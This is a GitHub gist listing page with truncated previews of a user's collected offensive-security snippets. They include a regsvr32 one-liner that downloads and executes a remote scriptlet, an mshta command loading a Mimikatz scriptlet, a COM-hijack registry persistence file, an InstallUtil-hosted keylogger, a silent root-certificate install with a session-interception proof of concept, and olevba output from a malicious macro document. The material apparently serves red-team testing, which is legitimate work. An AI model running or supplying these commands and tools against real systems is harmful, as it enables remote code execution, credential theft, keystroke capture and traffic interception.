unbaiat unbaiat
unbaiat
/ create-service-powershell.ps1
Created
November 19, 2017 17:31
— forked from yaplex/create-service-powershell.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $serviceName = "MyService" | |
| if (Get-Service $serviceName -ErrorAction SilentlyContinue) | |
| { | |
| $serviceToRemove = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'" | |
| $serviceToRemove.delete() | |
| "service removed" | |
| } | |
| else | |
| { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| :: Basic Test Lab One | |
| :: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct | |
| :: | |
| regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll | |
| :: NOTE it is a BAD idea to execute scripts from a repo that you do not control. | |
| :: NOTE We recommend executing from a server that you control. | |
| :: NOTE Thank You :) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import os | |
| import netifaces as ni | |
| import requests | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| ni.ifaddresses('tun0') | |
| ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] | |
| print "Te-ai legat la cap cu " + ip |
unbaiat
/ script.ps1
Created
January 24, 2018 13:44
Hooking MessageBox For No-Prompt Trusted Root Certificate Install
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Verify Not Present | |
| ( Get-ChildItem Cert:\CurrentUser\Root | Where-Object {$_.Subject -match "__Interceptor_Trusted_Root" }) | |
| #Import-Certificate | |
| ( Get-ChildItem -Path C:\Test\thing.cer ) | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root | |
| #Prompted | |
| Remove-Item -Path cert:\CurrentUser\Root\5C205339AE9FA846FA99D3FFF0CDEE65EB8D8E99 | |
unbaiat
/ InterceptorThing.ps1
Created
January 24, 2018 16:11
Interceptor - Normal User No Admin Required.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| This script demonstrates the ability to capture and tamper with Web sessions. | |
| For secure sessions, this is done by dynamically writing certificates to match the requested domain. | |
| This is only proof-of-concept, and should be used cautiously, to demonstrate the effects of such an attack. | |
| Function: Interceptor | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
unbaiat
/ Macro-Doc-Scriptlet-Ps1 threat
Created
February 17, 2018 14:42
— forked from JohnLaTwC/Macro-Doc-Scriptlet-Ps1 threat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## uploaded by @JohnLaTwC | |
| ## Sample hash: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531 | |
| olevba 0.52dev7 - http://decalage.info/python/oletools | |
| Flags Filename | |
| ----------- ----------------------------------------------------------------- | |
| OLE:MASI---- 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531 | |
| =============================================================================== | |
| FILE: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531 | |
| Type: OLE | |
| ------------------------------------------------------------------------------- |
unbaiat
/ winlogon.reg
Created
February 18, 2018 14:14
— forked from anonymous/winlogon.reg
WinLogon Windows 7 x64 COM Hijack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00] | |
| @="AtomicRedTeam" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam] | |
| @="AtomicRedTeam" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] |
unbaiat
/ InstallUtilMouseKeyLogger.cs
Created
February 27, 2018 04:38
Input Capture - InstallUtil Hosted MouseClick / KeyLogger -
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Windows.Forms; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //KeyStroke Mouse Clicks Code | |
| /* | |
| * https://code.google.com/p/klog-sharp/ | |
| */ |
unbaiat
/ mimikatz.sct
Created
March 17, 2018 04:04
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > |
unbaiat
/ PowerShellHostFinder.ps1
Created
March 18, 2018 11:55
— forked from mattifestation/PowerShellHostFinder.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author: Matt Graeber, SpecterOps | |
| ls C:\* -Recurse -Include '*.exe', '*.dll' -ErrorAction SilentlyContinue | % { | |
| try { | |
| $Assembly = [Reflection.Assembly]::ReflectionOnlyLoadFrom($_.FullName) | |
| if ($Assembly.GetReferencedAssemblies().Name -contains 'System.Management.Automation') { | |
| $_.FullName | |
| } | |
| } catch {} | |
| } |